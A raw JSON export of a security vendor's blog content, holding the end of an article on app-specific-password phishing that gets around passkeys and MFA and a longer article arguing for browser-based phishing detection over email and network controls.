Apple:",[],{},{"nodeType":250,"data":97035,"content":97036},{},[97037,97056],{"nodeType":254,"data":97038,"content":97039},{},[97040],{"nodeType":178,"data":97041,"content":97042},{},[97043,97046,97053],{"nodeType":173,"value":37,"marks":97044,"data":97045},[],{},{"nodeType":186,"data":97047,"content":97048},{"uri":96586},[97049],{"nodeType":173,"value":96589,"marks":97050,"data":97052},[97051],{"type":194},{},{"nodeType":173,"value":37,"marks":97054,"data":97055},[],{},{"nodeType":254,"data":97057,"content":97058},{},[97059],{"nodeType":178,"data":97060,"content":97061},{},[97062,97065,97074],{"nodeType":173,"value":37,"marks":97063,"data":97064},[],{},{"nodeType":186,"data":97066,"content":97068},{"uri":97067},"http://appleid.apple.com/account/manage/security/secondary-password",[97069],{"nodeType":173,"value":97070,"marks":97071,"data":97073},"appleid.apple.com/account/manage/security/secondary-password",[97072],{"type":194},{},{"nodeType":173,"value":37,"marks":97075,"data":97076},[],{},{"nodeType":178,"data":97078,"content":97079},{},[97080],{"nodeType":173,"value":97081,"marks":97082,"data":97083},"Unfortunately, there is no specific link to the Microsoft creation page — but as established above, this should not be enabled by default in Microsoft. ",[],{},{"nodeType":178,"data":97085,"content":97086},{},[97087],{"nodeType":173,"value":97088,"marks":97089,"data":97090},"If you encounter any more apps which allow ASPs, you can similarly add the specific ASP creation page to the list of blocked URLs.",[],{},{"nodeType":231,"data":97092,"content":97093},{},[],{"nodeType":169,"data":97095,"content":97096},{},[97097],{"nodeType":173,"value":97098,"marks":97099,"data":97101},"Want to learn more about Push?",[97100],{"type":370},{},{"nodeType":178,"data":97103,"content":97104},{},[97105],{"nodeType":173,"value":97106,"marks":97107,"data":97108},"And that’s not all — Push provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use, like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",[],{},{"nodeType":178,"data":97110,"content":97111},{},[97112,97115,97123],{"nodeType":173,"value":61741,"marks":97113,"data":97114},[],{},{"nodeType":186,"data":97116,"content":97118},{"uri":97117},"https://pushsecurity.com/",[97119],{"nodeType":173,"value":1472,"marks":97120,"data":97122},[97121],{"type":194},{},{"nodeType":173,"value":1477,"marks":97124,"data":97125},[],{},"App-Specific Password phishing: another novel way to get around passkeys and MFA","How App-Specific Password phishing is being used in the wild to bypass phishing-resistant authentication controls like passkeys. ","app-specific-password-phishing",{"items":97130},[97131,97133],{"sys":97132,"name":505},{"id":504},{"sys":97134,"name":509},{"id":508},{"items":97136},[97137],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":97138},{"url":1496},{"__typename":1528,"sys":97140,"content":97141,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":97682,"authorsCollection":97688},{"id":92907},{"json":97142},{"nodeType":165,"data":97143,"content":97144},{},[97145,97151,97157,97164,97187,97193,97198,97201,97208,97214,97220,97259,97265,97271,97274,97281,97287,97293,97299,97315,97321,97326,97333,97339,97345,97351,97356,97359,97366,97373,97379,97386,97392,97450,97456,97463,97469,97499,97506,97512,97519,97525,97532,97538,97586,97592,97595,97602,97608,97623,97653,97671,97676],{"nodeType":178,"data":97146,"content":97147},{},[97148],{"nodeType":173,"value":92916,"marks":97149,"data":97150},[],{},{"nodeType":178,"data":97152,"content":97153},{},[97154],{"nodeType":173,"value":92923,"marks":97155,"data":97156},[],{},{"nodeType":178,"data":97158,"content":97159},{},[97160],{"nodeType":173,"value":92930,"marks":97161,"data":97163},[97162],{"type":370},{},{"nodeType":178,"data":97165,"content":97166},{},[97167,97170,97177,97180,97184],{"nodeType":173,"value":92938,"marks":97168,"data":97169},[],{},{"nodeType":186,"data":97171,"content":97172},{"uri":92943},[97173],{"nodeType":173,"value":92946,"marks":97174,"data":97176},[97175],{"type":194},{},{"nodeType":173,"value":92951,"marks":97178,"data":97179},[],{},{"nodeType":173,"value":92955,"marks":97181,"data":97183},[97182],{"type":1646},{},{"nodeType":173,"value":92960,"marks":97185,"data":97186},[],{},{"nodeType":178,"data":97188,"content":97189},{},[97190],{"nodeType":173,"value":92967,"marks":97191,"data":97192},[],{},{"nodeType":312,"data":97194,"content":97197},{"target":97195},{"sys":97196},{"id":92974,"type":317,"linkType":318},[],{"nodeType":231,"data":97199,"content":97200},{},[],{"nodeType":169,"data":97202,"content":97203},{},[97204],{"nodeType":173,"value":92983,"marks":97205,"data":97207},[97206],{"type":370},{},{"nodeType":178,"data":97209,"content":97210},{},[97211],{"nodeType":173,"value":92991,"marks":97212,"data":97213},[],{},{"nodeType":178,"data":97215,"content":97216},{},[97217],{"nodeType":173,"value":92998,"marks":97218,"data":97219},[],{},{"nodeType":250,"data":97221,"content":97222},{},[97223,97232,97241,97250],{"nodeType":254,"data":97224,"content":97225},{},[97226],{"nodeType":178,"data":97227,"content":97228},{},[97229],{"nodeType":173,"value":93011,"marks":97230,"data":97231},[],{},{"nodeType":254,"data":97233,"content":97234},{},[97235],{"nodeType":178,"data":97236,"content":97237},{},[97238],{"nodeType":173,"value":93021,"marks":97239,"data":97240},[],{},{"nodeType":254,"data":97242,"content":97243},{},[97244],{"nodeType":178,"data":97245,"content":97246},{},[97247],{"nodeType":173,"value":93031,"marks":97248,"data":97249},[],{},{"nodeType":254,"data":97251,"content":97252},{},[97253],{"nodeType":178,"data":97254,"content":97255},{},[97256],{"nodeType":173,"value":93041,"marks":97257,"data":97258},[],{},{"nodeType":178,"data":97260,"content":97261},{},[97262],{"nodeType":173,"value":93048,"marks":97263,"data":97264},[],{},{"nodeType":178,"data":97266,"content":97267},{},[97268],{"nodeType":173,"value":93055,"marks":97269,"data":97270},[],{},{"nodeType":231,"data":97272,"content":97273},{},[],{"nodeType":169,"data":97275,"content":97276},{},[97277],{"nodeType":173,"value":93065,"marks":97278,"data":97280},[97279],{"type":370},{},{"nodeType":178,"data":97282,"content":97283},{},[97284],{"nodeType":173,"value":93073,"marks":97285,"data":97286},[],{},{"nodeType":178,"data":97288,"content":97289},{},[97290],{"nodeType":173,"value":93080,"marks":97291,"data":97292},[],{},{"nodeType":178,"data":97294,"content":97295},{},[97296],{"nodeType":173,"value":93087,"marks":97297,"data":97298},[],{},{"nodeType":178,"data":97300,"content":97301},{},[97302,97305,97312],{"nodeType":173,"value":93094,"marks":97303,"data":97304},[],{},{"nodeType":186,"data":97306,"content":97307},{"uri":27726},[97308],{"nodeType":173,"value":27729,"marks":97309,"data":97311},[97310],{"type":194},{},{"nodeType":173,"value":93105,"marks":97313,"data":97314},[],{},{"nodeType":178,"data":97316,"content":97317},{},[97318],{"nodeType":173,"value":93112,"marks":97319,"data":97320},[],{},{"nodeType":312,"data":97322,"content":97325},{"target":97323},{"sys":97324},{"id":93119,"type":317,"linkType":318},[],{"nodeType":169,"data":97327,"content":97328},{},[97329],{"nodeType":173,"value":93125,"marks":97330,"data":97332},[97331],{"type":370},{},{"nodeType":178,"data":97334,"content":97335},{},[97336],{"nodeType":173,"value":93133,"marks":97337,"data":97338},[],{},{"nodeType":178,"data":97340,"content":97341},{},[97342],{"nodeType":173,"value":93140,"marks":97343,"data":97344},[],{},{"nodeType":178,"data":97346,"content":97347},{},[97348],{"nodeType":173,"value":93147,"marks":97349,"data":97350},[],{},{"nodeType":312,"data":97352,"content":97355},{"target":97353},{"sys":97354},{"id":93154,"type":317,"linkType":318},[],{"nodeType":231,"data":97357,"content":97358},{},[],{"nodeType":169,"data":97360,"content":97361},{},[97362],{"nodeType":173,"value":93163,"marks":97363,"data":97365},[97364],{"type":370},{},{"nodeType":235,"data":97367,"content":97368},{},[97369],{"nodeType":173,"value":93171,"marks":97370,"data":97372},[97371],{"type":370},{},{"nodeType":178,"data":97374,"content":97375},{},[97376],{"nodeType":173,"value":93179,"marks":97377,"data":97378},[],{},{"nodeType":235,"data":97380,"content":97381},{},[97382],{"nodeType":173,"value":93186,"marks":97383,"data":97385},[97384],{"type":370},{},{"nodeType":178,"data":97387,"content":97388},{},[97389],{"nodeType":173,"value":93194,"marks":97390,"data":97391},[],{},{"nodeType":250,"data":97393,"content":97394},{},[97395,97404,97413,97432,97441],{"nodeType":254,"data":97396,"content":97397},{},[97398],{"nodeType":178,"data":97399,"content":97400},{},[97401],{"nodeType":173,"value":93207,"marks":97402,"data":97403},[],{},{"nodeType":254,"data":97405,"content":97406},{},[97407],{"nodeType":178,"data":97408,"content":97409},{},[97410],{"nodeType":173,"value":93217,"marks":97411,"data":97412},[],{},{"nodeType":254,"data":97414,"content":97415},{},[97416],{"nodeType":178,"data":97417,"content":97418},{},[97419,97422,97429],{"nodeType":173,"value":74365,"marks":97420,"data":97421},[],{},{"nodeType":186,"data":97423,"content":97424},{"uri":74370},[97425],{"nodeType":173,"value":74373,"marks":97426,"data":97428},[97427],{"type":194},{},{"nodeType":173,"value":37,"marks":97430,"data":97431},[],{},{"nodeType":254,"data":97433,"content":97434},{},[97435],{"nodeType":178,"data":97436,"content":97437},{},[97438],{"nodeType":173,"value":93246,"marks":97439,"data":97440},[],{},{"nodeType":254,"data":97442,"content":97443},{},[97444],{"nodeType":178,"data":97445,"content":97446},{},[97447],{"nodeType":173,"value":93256,"marks":97448,"data":97449},[],{},{"nodeType":178,"data":97451,"content":97452},{},[97453],{"nodeType":173,"value":93263,"marks":97454,"data":97455},[],{},{"nodeType":235,"data":97457,"content":97458},{},[97459],{"nodeType":173,"value":93270,"marks":97460,"data":97462},[97461],{"type":370},{},{"nodeType":178,"data":97464,"content":97465},{},[97466],{"nodeType":173,"value":93278,"marks":97467,"data":97468},[],{},{"nodeType":250,"data":97470,"content":97471},{},[97472,97481,97490],{"nodeType":254,"data":97473,"content":97474},{},[97475],{"nodeType":178,"data":97476,"content":97477},{},[97478],{"nodeType":173,"value":93291,"marks":97479,"data":97480},[],{},{"nodeType":254,"data":97482,"content":97483},{},[97484],{"nodeType":178,"data":97485,"content":97486},{},[97487],{"nodeType":173,"value":93301,"marks":97488,"data":97489},[],{},{"nodeType":254,"data":97491,"content":97492},{},[97493],{"nodeType":178,"data":97494,"content":97495},{},[97496],{"nodeType":173,"value":93311,"marks":97497,"data":97498},[],{},{"nodeType":235,"data":97500,"content":97501},{},[97502],{"nodeType":173,"value":93318,"marks":97503,"data":97505},[97504],{"type":370},{},{"nodeType":178,"data":97507,"content":97508},{},[97509],{"nodeType":173,"value":93326,"marks":97510,"data":97511},[],{},{"nodeType":235,"data":97513,"content":97514},{},[97515],{"nodeType":173,"value":93333,"marks":97516,"data":97518},[97517],{"type":370},{},{"nodeType":178,"data":97520,"content":97521},{},[97522],{"nodeType":173,"value":93341,"marks":97523,"data":97524},[],{},{"nodeType":235,"data":97526,"content":97527},{},[97528],{"nodeType":173,"value":93348,"marks":97529,"data":97531},[97530],{"type":370},{},{"nodeType":178,"data":97533,"content":97534},{},[97535],{"nodeType":173,"value":93356,"marks":97536,"data":97537},[],{},{"nodeType":250,"data":97539,"content":97540},{},[97541,97550,97559,97568,97577],{"nodeType":254,"data":97542,"content":97543},{},[97544],{"nodeType":178,"data":97545,"content":97546},{},[97547],{"nodeType":173,"value":93369,"marks":97548,"data":97549},[],{},{"nodeType":254,"data":97551,"content":97552},{},[97553],{"nodeType":178,"data":97554,"content":97555},{},[97556],{"nodeType":173,"value":93379,"marks":97557,"data":97558},[],{},{"nodeType":254,"data":97560,"content":97561},{},[97562],{"nodeType":178,"data":97563,"content":97564},{},[97565],{"nodeType":173,"value":93389,"marks":97566,"data":97567},[],{},{"nodeType":254,"data":97569,"content":97570},{},[97571],{"nodeType":178,"data":97572,"content":97573},{},[97574],{"nodeType":173,"value":93399,"marks":97575,"data":97576},[],{},{"nodeType":254,"data":97578,"content":97579},{},[97580],{"nodeType":178,"data":97581,"content":97582},{},[97583],{"nodeType":173,"value":93409,"marks":97584,"data":97585},[],{},{"nodeType":178,"data":97587,"content":97588},{},[97589],{"nodeType":173,"value":93416,"marks":97590,"data":97591},[],{},{"nodeType":231,"data":97593,"content":97594},{},[],{"nodeType":169,"data":97596,"content":97597},{},[97598],{"nodeType":173,"value":93426,"marks":97599,"data":97601},[97600],{"type":370},{},{"nodeType":178,"data":97603,"content":97604},{},[97605],{"nodeType":173,"value":93434,"marks":97606,"data":97607},[],{},{"nodeType":178,"data":97609,"content":97610},{},[97611,97614,97620],{"nodeType":173,"value":93441,"marks":97612,"data":97613},[],{},{"nodeType":186,"data":97615,"content":97616},{"uri":92943},[97617],{"nodeType":173,"value":93448,"marks":97618,"data":97619},[],{},{"nodeType":173,"value":1477,"marks":97621,"data":97622},[],{},{"nodeType":250,"data":97624,"content":97625},{},[97626,97635,97644],{"nodeType":254,"data":97627,"content":97628},{},[97629],{"nodeType":178,"data":97630,"content":97631},{},[97632],{"nodeType":173,"value":93464,"marks":97633,"data":97634},[],{},{"nodeType":254,"data":97636,"content":97637},{},[97638],{"nodeType":178,"data":97639,"content":97640},{},[97641],{"nodeType":173,"value":93474,"marks":97642,"data":97643},[],{},{"nodeType":254,"data":97645,"content":97646},{},[97647],{"nodeType":178,"data":97648,"content":97649},{},[97650],{"nodeType":173,"value":93484,"marks":97651,"data":97652},[],{},{"nodeType":178,"data":97654,"content":97655},{},[97656,97660,97667],{"nodeType":173,"value":93491,"marks":97657,"data":97659},[97658],{"type":370},{},{"nodeType":186,"data":97661,"content":97662},{"uri":473},[97663],{"nodeType":173,"value":93499,"marks":97664,"data":97666},[97665],{"type":370},{},{"nodeType":173,"value":93504,"marks":97668,"data":97670},[97669],{"type":370},{},{"nodeType":312,"data":97672,"content":97675},{"target":97673},{"sys":97674},{"id":93512,"type":317,"linkType":318},[],{"nodeType":178,"data":97677,"content":97678},{},[97679],{"nodeType":173,"value":37,"marks":97680,"data":97681},[],{},{"items":97683},[97684,97686],{"sys":97685,"name":505},{"id":504},{"sys":97687,"name":509},{"id":508},{"items":97689},[97690],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":97691},{"url":25597},{"__typename":1528,"sys":97693,"content":97695,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":98345,"authorsCollection":98351},{"id":97694},"3dtvtDQdcQ6fAW7CB8VOFP",{"json":97696},{"nodeType":165,"data":97697,"content":97698},{},[97699,97706,97713,97720,97723,97731,97738,97758,97791,97797,97817,97823,97847,97850,97858,97865,97880,97895,97901,97908,97915,97921,97937,97940,97948,97955,97962,97969,97976,97979,97987,97994,98001,98021,98028,98036,98078,98085,98091,98098,98104,98111,98114,98122,98137,98144,98186,98198,98201,98209,98216,98223,98256,98263,98283,98289,98295,98298,98305,98312,98329,98335],{"nodeType":178,"data":97700,"content":97701},{},[97702],{"nodeType":173,"value":97703,"marks":97704,"data":97705},"Phishing attacks remain a huge challenge for organizations in 2025. In fact, with attackers increasingly leveraging identity-based techniques over software exploits, phishing arguably poses a bigger threat than ever before. ",[],{},{"nodeType":178,"data":97707,"content":97708},{},[97709],{"nodeType":173,"value":97710,"marks":97711,"data":97712},"Attackers are turning to identity attacks like phishing because they can achieve all of the same objectives as they would in a traditional endpoint or network attack, simply by logging into a victim’s account. And with organizations now using hundreds of internet apps across their workforce, the scope of accounts that can be phished or targeted with stolen credentials has grown exponentially. ",[],{},{"nodeType":178,"data":97714,"content":97715},{},[97716],{"nodeType":173,"value":97717,"marks":97718,"data":97719},"With MFA-bypassing phishing kits the new normal, capable of phishing accounts protected by SMS, OTP, and push-based methods, detection controls are being put under constant pressure as prevention controls fall short. ",[],{},{"nodeType":231,"data":97721,"content":97722},{},[],{"nodeType":169,"data":97724,"content":97725},{},[97726],{"nodeType":173,"value":97727,"marks":97728,"data":97730},"Attackers are bypassing detection controls",[97729],{"type":370},{},{"nodeType":178,"data":97732,"content":97733},{},[97734],{"nodeType":173,"value":97735,"marks":97736,"data":97737},"The majority of phishing detection and control enforcement is focused at the email and network layer — typically at the Secure Email Gateway (SEG), Secure Web Gateway (SWG)/proxy, or both. ",[],{},{"nodeType":178,"data":97739,"content":97740},{},[97741,97745,97754],{"nodeType":173,"value":97742,"marks":97743,"data":97744},"But attackers know this, ",[],{},{"nodeType":186,"data":97746,"content":97748},{"uri":97747},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection-p2/",[97749],{"nodeType":173,"value":97750,"marks":97751,"data":97753},"and are taking steps to avoid these controls",[97752],{"type":194},{},{"nodeType":173,"value":97755,"marks":97756,"data":97757},", by:",[],{},{"nodeType":250,"data":97759,"content":97760},{},[97761,97771,97781],{"nodeType":254,"data":97762,"content":97763},{},[97764],{"nodeType":178,"data":97765,"content":97766},{},[97767],{"nodeType":173,"value":97768,"marks":97769,"data":97770},"Routinely evading IoC driven blocklists by dynamically rotating and updating commonly signatured elements like IPs, domains, and URLs.",[],{},{"nodeType":254,"data":97772,"content":97773},{},[97774],{"nodeType":178,"data":97775,"content":97776},{},[97777],{"nodeType":173,"value":97778,"marks":97779,"data":97780},"Preventing analysis of their phishing pages by implementing bot protection like CAPTCHA or Cloudflare Turnstile alongside other detection evasion methods. ",[],{},{"nodeType":254,"data":97782,"content":97783},{},[97784],{"nodeType":178,"data":97785,"content":97786},{},[97787],{"nodeType":173,"value":97788,"marks":97789,"data":97790},"Changing visual and DOM elements on the page so that even when the page is loaded, detection signatures may fail to trigger.  ",[],{},{"nodeType":312,"data":97792,"content":97796},{"target":97793},{"sys":97794},{"id":97795,"type":317,"linkType":318},"5w44LsamEfcwSACx3MA997",[],{"nodeType":178,"data":97798,"content":97799},{},[97800,97804,97813],{"nodeType":173,"value":97801,"marks":97802,"data":97803},"And in fact, by launching multi- and cross-channel attacks, attackers are evading email-based controls entirely. Just see ",[],{},{"nodeType":186,"data":97805,"content":97807},{"uri":97806},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/?utm_campaign=12081956-FY25Q2_Hacker-News-Article&utm_source=thehackernews&utm_medium=sponsored&utm_content=external-article",[97808],{"nodeType":173,"value":97809,"marks":97810,"data":97812},"this recent example",[97811],{"type":194},{},{"nodeType":173,"value":97814,"marks":97815,"data":97816},", where attackers impersonating Onfido delivered their phishing attack via malicious Google ads (aka malvertising) — bypassing email altogether. ",[],{},{"nodeType":312,"data":97818,"content":97822},{"target":97819},{"sys":97820},{"id":97821,"type":317,"linkType":318},"3sGmVHl1Rwjyw3TMZSYuy4",[],{"nodeType":178,"data":97824,"content":97825},{},[97826,97830,97835,97839,97843],{"nodeType":173,"value":97827,"marks":97828,"data":97829},"It’s worth pointing out the limitations of email-based solutions here too. Email has some additional checks around the sender’s reputation and things like DMARC/DKIM, but these don’t actually identify malicious ",[],{},{"nodeType":173,"value":97831,"marks":97832,"data":97834},"pages",[97833],{"type":370},{},{"nodeType":173,"value":97836,"marks":97837,"data":97838},". Similarly, some modern email solutions are doing much deeper analysis of the ",[],{},{"nodeType":173,"value":5440,"marks":97840,"data":97842},[97841],{"type":370},{},{"nodeType":173,"value":97844,"marks":97845,"data":97846}," of an email. But… that doesn’t really help with identifying the phishing sites themselves (just indicates that one might be linked in the email). This is much more appropriate for BEC-style attacks where the goal is to social engineer the victim, as opposed to linking them to a malicious page. And this still doesn’t help with attacks launched over different mediums as we’ve highlighted above.",[],{},{"nodeType":231,"data":97848,"content":97849},{},[],{"nodeType":169,"data":97851,"content":97852},{},[97853],{"nodeType":173,"value":97854,"marks":97855,"data":97857},"How browser-based detection and response can level the playing field",[97856],{"type":370},{},{"nodeType":178,"data":97859,"content":97860},{},[97861],{"nodeType":173,"value":97862,"marks":97863,"data":97864},"Most phishing attacks involve the delivery of a malicious link to a user. The user clicks the link and loads a malicious page. In the vast majority of cases, the malicious page is a login portal for a specific website, where the goal for the attacker is to steal the victim’s account.",[],{},{"nodeType":178,"data":97866,"content":97867},{},[97868,97872,97876],{"nodeType":173,"value":97869,"marks":97870,"data":97871},"These attacks are happening pretty much exclusively in the victim’s browser. So rather than building more email or network based controls looking from the outside-in at phishing pages accessed in the browser, there’s a huge opportunity presented by building phishing detection and response capabilities ",[],{},{"nodeType":173,"value":4821,"marks":97873,"data":97875},[97874],{"type":1646},{},{"nodeType":173,"value":97877,"marks":97878,"data":97879}," the browser. ",[],{},{"nodeType":178,"data":97881,"content":97882},{},[97883,97887,97892],{"nodeType":173,"value":97884,"marks":97885,"data":97886},"When we look at the history of detection and response, this makes a lot of sense. When endpoint attacks skyrocketed in the late 2000s / early 2010s, they took advantage of the fact that defenders were trying to detect malware with primarily network-based detections, signature-based analysis of files, and running files in sandboxes (which was reliably defeated with sandbox-aware malware and using things as simple as putting an execution delay in the code). But this gave way to EDR, which presented a better way of observing and intercepting malicious software in ",[],{},{"nodeType":173,"value":97888,"marks":97889,"data":97891},"real-time",[97890],{"type":370},{},{"nodeType":173,"value":197,"marks":97893,"data":97894},[],{},{"nodeType":312,"data":97896,"content":97900},{"target":97897},{"sys":97898},{"id":97899,"type":317,"linkType":318},"1KFwJvbIMiWHb1erWlljZf",[],{"nodeType":178,"data":97902,"content":97903},{},[97904],{"nodeType":173,"value":97905,"marks":97906,"data":97907},"The key here was getting inside the data stream to be able to observe activity in real-time on the endpoint. ",[],{},{"nodeType":178,"data":97909,"content":97910},{},[97911],{"nodeType":173,"value":97912,"marks":97913,"data":97914},"We’re in a similar position today. Modern phishing attacks are happening on web pages accessed via the browser, and the tools we’re relying on — email, network, even endpoint — don’t have the required visibility. They’re looking from the outside-in. ",[],{},{"nodeType":312,"data":97916,"content":97920},{"target":97917},{"sys":97918},{"id":97919,"type":317,"linkType":318},"59t6AcjpRjs3VQQXQO3PWu",[],{"nodeType":178,"data":97922,"content":97923},{},[97924,97928,97933],{"nodeType":173,"value":97925,"marks":97926,"data":97927},"But what if we could do detection and response from ",[],{},{"nodeType":173,"value":97929,"marks":97930,"data":97932},"inside the browser?",[97931],{"type":370},{},{"nodeType":173,"value":97934,"marks":97935,"data":97936}," Here’s three reasons why the browser is best for stopping phishing attacks:",[],{},{"nodeType":231,"data":97938,"content":97939},{},[],{"nodeType":169,"data":97941,"content":97942},{},[97943],{"nodeType":173,"value":97944,"marks":97945,"data":97947},"#1: Analyze pages, not links",[97946],{"type":370},{},{"nodeType":178,"data":97949,"content":97950},{},[97951],{"nodeType":173,"value":97952,"marks":97953,"data":97954},"Common phishing detections rely on the analysis of links or static HTML as opposed to malicious pages. Modern phishing pages are no longer static HTML — like most other modern web pages, these are dynamic web apps rendered in the browser, with JavaScript dynamically rewriting the page and launching the malicious content. This means that most basic, static checks fail to identify the malicious content running on the page. ",[],{},{"nodeType":178,"data":97956,"content":97957},{},[97958],{"nodeType":173,"value":97959,"marks":97960,"data":97961},"Without deeper analysis, you’re reliant on analysing things like domains, URLs and IP addresses against known-bad blocklists. But these are all highly disposable. Attackers are buying them in bulk, constantly taking over legitimate domains, and generally planning for the fact that they’ll get through a lot of them. Modern phishing architecture is also able to dynamically rotate and update the links served to visitors from a continually refreshed pool (so every person that clicks the link gets served a different URL) and even going as far as using things like one-time magic links (which also means that any security team members trying to investigate the page later won’t be able to do so). ",[],{},{"nodeType":178,"data":97963,"content":97964},{},[97965],{"nodeType":173,"value":97966,"marks":97967,"data":97968},"Ultimately, this means that blocklists just aren’t that effective — because it’s trivial for attackers to change the indicators being used to create detections. If you think about the Pyramid of Pain, these indicators sit right at the bottom — the kind of thing we’ve been moving away from for years in the endpoint security world.  ",[],{},{"nodeType":178,"data":97970,"content":97971},{},[97972],{"nodeType":173,"value":97973,"marks":97974,"data":97975},"But in the browser, you can observe the rendered web page in all its glory. With much deeper visibility of the page (and its malicious elements) you can…",[],{},{"nodeType":231,"data":97977,"content":97978},{},[],{"nodeType":169,"data":97980,"content":97981},{},[97982],{"nodeType":173,"value":97983,"marks":97984,"data":97986},"#2: Detect TTPs, not IoCs",[97985],{"type":370},{},{"nodeType":178,"data":97988,"content":97989},{},[97990],{"nodeType":173,"value":97991,"marks":97992,"data":97993},"Even where TTP-based detections are in play, they’re typically reliant on either piecing together network requests, or loading the page in a sandbox. ",[],{},{"nodeType":178,"data":97995,"content":97996},{},[97997],{"nodeType":173,"value":97998,"marks":97999,"data":98000},"However, attackers are getting pretty good at evading sandbox analysis — simply by implementing bot protection by requiring user interaction with a CAPTCHA or Cloudflare Turnstile. Even if you can get past Turnstile, then you’ll need to supply the correct URL parameters and headers, and execute JavaScript, to be served the malicious page. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",[],{},{"nodeType":178,"data":98002,"content":98003},{},[98004,98008,98017],{"nodeType":173,"value":98005,"marks":98006,"data":98007},"And if all this wasn’t enough, ",[],{},{"nodeType":186,"data":98009,"content":98011},{"uri":98010},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection-p2/?utm_campaign=12081956-FY25Q2_Hacker-News-Article&utm_source=thehackernews&utm_medium=sponsored&utm_content=external-article",[98012],{"nodeType":173,"value":98013,"marks":98014,"data":98016},"they’re also obfuscating both visual and DOM elements to prevent signature-based detections from picking them up",[98015],{"type":194},{},{"nodeType":173,"value":98018,"marks":98019,"data":98020}," — so even if you can land on the page, there’s a high chance that your detections won’t trigger.",[],{},{"nodeType":178,"data":98022,"content":98023},{},[98024],{"nodeType":173,"value":98025,"marks":98026,"data":98027},"When using a proxy, you’ll have some visibility of the network traffic generated by a user accessing and interacting with a page. However, you’ll struggle to correlate key actions like whether the user entered their password with the specific tab when dealing with the sheer volume of disorganized network traffic data. ",[],{},{"nodeType":178,"data":98029,"content":98030},{},[98031],{"nodeType":173,"value":98032,"marks":98033,"data":98035},"But you get much better visibility of all this in the browser, with access to:",[98034],{"type":370},{},{"nodeType":250,"data":98037,"content":98038},{},[98039,98048,98058,98068],{"nodeType":254,"data":98040,"content":98041},{},[98042],{"nodeType":178,"data":98043,"content":98044},{},[98045],{"nodeType":173,"value":81804,"marks":98046,"data":98047},[],{},{"nodeType":254,"data":98049,"content":98050},{},[98051],{"nodeType":178,"data":98052,"content":98053},{},[98054],{"nodeType":173,"value":98055,"marks":98056,"data":98057},"Full user interaction tracing — every click, keystroke, or DOM change can be traced",[],{},{"nodeType":254,"data":98059,"content":98060},{},[98061],{"nodeType":178,"data":98062,"content":98063},{},[98064],{"nodeType":173,"value":98065,"marks":98066,"data":98067},"Full inspection at every layer of execution, not just initial HTML served",[],{},{"nodeType":254,"data":98069,"content":98070},{},[98071],{"nodeType":178,"data":98072,"content":98073},{},[98074],{"nodeType":173,"value":98075,"marks":98076,"data":98077},"Full access to browser APIs, to correlate with browser history, local storage, attached cookies, etc.",[],{},{"nodeType":178,"data":98079,"content":98080},{},[98081],{"nodeType":173,"value":98082,"marks":98083,"data":98084},"This gives you everything you need to build high-fidelity detections focused on page behavior and user interaction – that are much harder for attackers to get around when compared to IoC-based detections. ",[],{},{"nodeType":312,"data":98086,"content":98090},{"target":98087},{"sys":98088},{"id":98089,"type":317,"linkType":318},"1YggWcADAWgt3sUkXMsVIw",[],{"nodeType":178,"data":98092,"content":98093},{},[98094],{"nodeType":173,"value":98095,"marks":98096,"data":98097},"In the browser, you get much better visibility of the user and page behavior to enable phishing page detection.",[],{},{"nodeType":312,"data":98099,"content":98103},{"target":98100},{"sys":98101},{"id":98102,"type":317,"linkType":318},"1BKgjnYkLJIRW0LJZYpfga",[],{"nodeType":178,"data":98105,"content":98106},{},[98107],{"nodeType":173,"value":98108,"marks":98109,"data":98110},"And with this new visibility, because you’re in the browser and seeing the page at the same time as the user is interacting with it, you can…",[],{},{"nodeType":231,"data":98112,"content":98113},{},[],{"nodeType":169,"data":98115,"content":98116},{},[98117],{"nodeType":173,"value":98118,"marks":98119,"data":98121},"#3: Intercept in real time, not post mortem",[98120],{"type":370},{},{"nodeType":178,"data":98123,"content":98124},{},[98125,98129,98134],{"nodeType":173,"value":98126,"marks":98127,"data":98128},"For non-browser solutions, ",[],{},{"nodeType":173,"value":98130,"marks":98131,"data":98133},"real-time phishing detection is basically nonexistent",[98132],{"type":370},{},{"nodeType":173,"value":197,"marks":98135,"data":98136},[],{},{"nodeType":178,"data":98138,"content":98139},{},[98140],{"nodeType":173,"value":98141,"marks":98142,"data":98143},"At best, your proxy-based solution might be able to detect malicious behavior via the network traffic generated by your user interacting with the page. But because of the complexity of reconstructing network requests post-TLS-encryption, this typically happens on a time delay and is not entirely reliable. ",[],{},{"nodeType":178,"data":98145,"content":98146},{},[98147,98151,98156,98160,98165,98169,98173,98177,98182],{"nodeType":173,"value":98148,"marks":98149,"data":98150},"If a page is flagged, it usually requires further investigation by a security team to rule out any false positives and kick off an investigation. This can take ",[],{},{"nodeType":173,"value":98152,"marks":98153,"data":98155},"hours",[98154],{"type":370},{},{"nodeType":173,"value":98157,"marks":98158,"data":98159}," at best, probably ",[],{},{"nodeType":173,"value":98161,"marks":98162,"data":98164},"days",[98163],{"type":370},{},{"nodeType":173,"value":98166,"marks":98167,"data":98168},". Then, once a page is identified as malicious and IoCs are created, it can take ",[],{},{"nodeType":173,"value":98161,"marks":98170,"data":98172},[98171],{"type":370},{},{"nodeType":173,"value":98174,"marks":98175,"data":98176}," or even ",[],{},{"nodeType":173,"value":98178,"marks":98179,"data":98181},"weeks",[98180],{"type":370},{},{"nodeType":173,"value":98183,"marks":98184,"data":98185}," before the information is distributed, TI feeds are updated, and ingested into blocklists. ",[],{},{"nodeType":178,"data":98187,"content":98188},{},[98189,98193],{"nodeType":173,"value":98190,"marks":98191,"data":98192},"But in the browser, you’re observing the page in real-time, as the user sees it, from inside the browser. This is a game changer when it comes to not just detecting, but intercepting and shutting down attacks before a user is phished and the damage is done. ",[],{},{"nodeType":173,"value":98194,"marks":98195,"data":98197},"This changes the focus from post mortem containment and cleanup, to 